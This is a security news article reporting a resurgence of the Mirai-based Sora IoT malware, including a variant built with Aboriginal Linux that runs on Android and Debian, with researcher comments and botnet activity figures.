Big changes on the IoT malware scene. Security researchers have spotted a version of the Mirai IoT malware that can run on a vast range of architectures, and even on Android devices.
This Mirai malware strain is called Sora, a strain that was first spotted at the start of the year.
Initial versions were nothing out of the ordinary, and Sora’s original author soon moved on to developing the Mirai Owari version, shortly after Sora’s creation.
“SORA is an abandoned project for now and I will continue to work on OWARI,” Wicked, the Sora malware author, said in an interview with NewSky Security.
Mirai Sora variants are making a comeback
The Sora code was abandoned, but not forgotten. Ankit Anubhav, a malware analyst with NewSky Security, told Bleeping Computer that the number of Sora detections have been steadily increasing since June. See graph below.
It appears that other malware authors took it upon themselves to improve SORA’s code. A Symantec report published today details one such improved Sora version.
New Sora version compiled with Aboriginal Linux
The thing that stood out about this new Sora version was that the malware author compiled it with Aboriginal Linux, a toolchain utility that takes source code and generates binaries for a considerable number of platforms.
The author behind this new strain was using all these binaries in his infection process, trying to spread his Sora variant to as many devices as he could.
Once he’d access a device by guessing its SSH password, the infection routine would download and execute a list of Sora binaries, one by one, until it would found one appropriate for the infected device’s platform.
This particular Mirai Sora variant that used Aboriginal Linux has been around since July. Symantec says they found binaries that successfully executed on the Android and Debian operating systems, platforms that Mirai has never been successful at infecting before.
Mirai activity is on the rise
Troy Mursch, a US-based security researcher who runs a Mirai tracker, told Bleeping Computer today in a private conversation that Sora isn’t the only one seeing a resurgence, and that the number of Mirai attacks have been steadily increasing all year.
Year-to-date, incoming traffic matching the Mirai-like signature has been observed from 86,063 unique source IPs.
Spikes of #botnet activity started in June. @circl_lu has shared a similar observation. pic.twitter.com/z0rMRVyI2I
— Bad Packets Report (@bad_packets) August 1, 2018
“Even as devices are rebooted they become fresh targets again as the underlying vulnerability never gets patched,” Mursch said, pinpointing the blame on outdated devices that do not receive security patches.
Until this changes, Mirai will continue to plague the IoT scene and the whole Internet, in general.